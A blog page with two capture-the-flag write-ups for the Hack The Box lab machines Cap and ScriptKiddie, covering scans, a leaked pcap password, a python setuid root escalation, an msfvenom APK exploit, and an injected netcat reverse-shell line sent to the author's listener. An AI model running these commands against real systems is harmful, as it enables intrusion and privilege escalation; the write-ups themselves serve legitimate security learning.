Tag Archives: easy

Hack The Box: Cap

Prelude

Cap was an easy machine from Hack The Box developed by InfoSecJack. This was actually the easiest box from Hack The Box and it is perfect for a total beginner.

Also, before the release of this machine, I was pretty sure what the privilege escalation vector would be because of the name and I was right๐Ÿ˜…. Getting into the user and escalating privileges have link towards the machine’s name, which I personally think is pretty cool!  ๐Ÿ˜Ž

Letโ€™s start the exploitation.

Exploitation

As usual I started the exploitation with an Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.245

And the result I got is as follows.

# Nmap 7.91 scan initiated Sun Jun  6 00:30:41 2021 as: /usr/bin/nmap -sCV -v -oA nmap/tcp 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.17s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:57 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sat, 05 Jun 2021 19:00:51 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: gunicorn
|_http-title: Security Dashboard

We have three ports open.

The SSH banner pointed that the machine might be running Ubuntu. I then tried FTP to anonymous login, but I couldn’t login to it as anonymous.

Navigating to http://10.10.10.245 showed the following page.

It was a security dashboard, which was already logged in as user Nathan. Sweet!

The website had three functionalities.

The dashboard can show IP information, Netstat information and it can capture packets for 5 seconds and provide the .pcap files.

I tried the IP and netstat functions, but there wasn’t anything interesting. So, I decided to capture the .pcap file and look for passwords.

I thought that since ftp and http are unencrypted, we can capture the plaintext credentials, from the pcap file if our timing is right.

The pcap file can be downloaded from http://10.10.10.245/data/X , where X is a number.

I captured several pcap files at different timings and looked it in Wireshark, but nothing interesting was there.

Then, I decided to brute force the /data directory for some leftover pcap files using ffuf.

ffuf -c -w  /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt  -u http://10.10.10.245/data/FUZZ -fs 208

And got the following output.

All of the directories after 1 was made by me, but 0 wasn’t a pcap file generated by me.

So, I went to http://10.10.10.245/data/0 and downloaded the pcap file.

I then opened the pcap file in Wireshark to analyze it and got the plaintext FTP password of user Nathan.

The password for nathan was Buck3tH4TF0RM3!.

So, I used the password in SSH and I was in!

Sweet 90s Kid GIF - BrentRambo ThumbsUp Sweet - Discover & Share GIFs | 90s kids, Gif, Cool gifs

Privilege Escalation

Like I said before, I had a guess on where to look for privilege escalation before the box’s release. So, I looked straight into it. Linux Capabilities!

So, I searched for files with capabilities using the following command.

getcap -r / 2>/dev/null

And I got a list.

Python has cap_setuid capability, which allows python to set the UserID of the process. Which means python can set UID to 0, making it root!

Hacktricks has a great checklist on exploiting capabilities. I found the exploitation command from there and executed it.

python3 -c 'import os; os.setuid(0); os.system("/bin/bash");'

And I am w00t!

Postlude

And that was Cap!

This was an easy but fun box and I really enjoyed every aspect of this box.

Kudos to InfoSecJack for this awesome box!

Peace out! โœŒ๏ธ

Hack The Box: ScriptKiddie

Prelude

ScriptKiddie was an easy machine from Hack The Box, developed by the CTF addict 0xdf ๐Ÿ˜.

Even though this was an easy box, there were some rabbit holes and weirdness that inexperienced people will fall for. I know this because I fell for them face down.

Hard! ๐Ÿ˜…

But, overall this was a good machine and taught me a little bit more about some rabbit holes to avoid.

Letโ€™s start the exploitation.

Exploitation

As usual I started the exploitation with Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.226

And the result I got is as follows.

# Nmap 7.91 scan initiated Fri May 14 13:26:06 2021 as: /usr/bin/nmap -sCV -v -oN tcp 10.10.10.226
Nmap scan report for 10.10.10.226
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two ports open.

The SSH banner pointed that the machine might be running Ubuntu Focal.

After finding out the target OS, I proceeded to enumerate port 5080.

Navigating to http://10.10.10.226:5000 showed the following page.

This was a web frontend developed by a script kiddie hacker which had three functions.

  • To scan Nmap top 100 ports ,
  • To generate windows, linux and android payloads using MSFvenom
  • Searchsploit to search for exploits.

Diving Nose Down into a Rabbit Hole

Jump Jump In The Hole GIF - Jump JumpInTheHole - Discover & Share GIFs

Since this was an easy box, my first plan was to check for command injections. So, I started testing for command injections and it was a rabbit hole.

All the inputs send to the tools were properly sanitized and throwed different errors when presented with bad inputs.

When a bad input was sent to the searchsploit tool via the website, the website throwed the following error.

stop hacking me- we’ll hack you back

This was a clue foreshadowing the lateral privilege escalation we have to do later and a clue that I was going into a rabbit hole!  ๐Ÿ˜… 

I spent way too much time in this rabbit hole before realizing my mistake.

I didn’t focus on the error message because, this webpage had variable response times. Sometimes the webpage will return within 200ms and sometimes it will take >400 ms.

So, when I was testing for command injections in the Searchsploit field of the webpage, I noticed the varied response timings and mistaked it for an indication of a successful command injection.

I sent different reverse shell payloads to the searchsploit tool and got this output on my netcat listener.

I was getting a SYN packet followed by a RST packet.

I didn’t understood this behaviour as I thought this might be due to some WAF rule in place and wasted hours trouble shooting this issue.

It was only later I realized that this was the result of an automated Nmap Stealth scan coming back to me and not an indication of command injection!

Top 30 Dying Inside GIFs | Find the best GIF on Gfycat
Stupid me!

Intended way of gaining User Shell

The intended way of getting the user shell is by exploiting a code execution vulnerability in Metasploit Framework 6.0.11, when MSFVenom parsing a malicious APK template.

I modified the command variable with netcat without -e payload in the exploit script.

Then I ran the script and it generated the malicious evil.apk file at /tmp/tmpsfby41gg/evil.apk.

I uploaded the evil.apk to the website as an android template.

And I got a shell back!

We can also use the metasploit module exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection to generate the apk.

Privilege Escalation

Privilege escalation was a two step process, which was relatively simple. However, due to some issues, the first privesc step took more time than I would’ve liked.

We first get into the shell as the user kid. But, I quickly realize that kid user has access to read the contents of user pwn‘s home folder.

Inside pwn‘s home folder, we can see a script named scanlosers.sh, which was the script responsible for the automated nmap scan we discussed earlier.

The script is rather short and the contents are as shown below.

#!/bin/bash

log="hackers"

cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    echo $ip
    sudo sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

So, the script basically does is to open the file /home/kid/logs/hackers, extracts the third field separated by spaces and uses that IP address to scan the target.

Let’s check the permissions of /home/kid/logs/hackers .

Both kid and pwn have read/write access to the file hackers. Since this script doesn’t use any Input sanitization, we can use this vector to execute commands as pwn.

This is where I was stuck for quite some time since, for some reason, my regular reverse shell payloads weren’t working at all.

I have tried msfvenom payloads, PayloadAllTheThings payloads and even compiled a reverse shell binary in C.

However, none of them worked for some reason. Most of them didn’t work and the ones that worked only gave me a partial shell with the following error.

Ncat: Connection from 10.10.10.226.
Ncat: Connection from 10.10.10.226:47312.
bash: cannot set terminal process group (863): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ exit

I believe that, some times the incron service that detects the change in the /home/kid/logs/hackers would gets messed up occasionally. At that time, even entering the correct payload to the hackers file won’t work, unless the service is restarted or the machine was reset.

Also, if the kid user removed the hackers file, then the file permissions will be reset and the pwn user won’t be able to read the file. If that’s the case, then we have to reset the machine to reset the file permissions.

Due to these behaviors of the machine, I was stuck at this point for quite some time.

Along with this weirdness, the target’s netcat binary didn’t supported the -e option. So, I decided to upload a static nc binary with-e to the target.

But when I tried to execute the binary as pwn, for some reason, executing nc static from the /tmp directory didn’t work (Most probably because of noexec). So, I copied a static binary to /dev/shm and used the following command to execute the netcat as pwn user. Here ncx64 is the netcat static binary.

echo "    ;/dev/shm/ncx64 -e sh 10.10.16.12 9001 " > hacker

The spaces at the beginning is for padding; since the script uses the third field from the hackers file as the input to the script and the ; is used to terminate the previous command. Use 2 spaces and above to execute the commands.

And I got a shell back!

Yes Finally GIFs | Tenor

One last ride.. I mean Privesc!

Now, I was logged in as the pwn user. Issuing the sudo -l command and saw the following output.

We can run msfconsole as root. So, I issued the following command to run msfconsole as root.

sudo -u root /opt/metasploit-framework-6.0.9/msfconsole

And inside msfconsole, I entered bash to enter bash shell.

Aannnnd W00t!

We’re root!

Postlude

This was a great machine and was a frustrating, yet rewarding experience for me! Even though this is fairly straightforward machine, the overall weirdness of the box made it difficult to exploit, but nevertheless was a good experience.

Kudos to 0xdf for creating such an awesome box!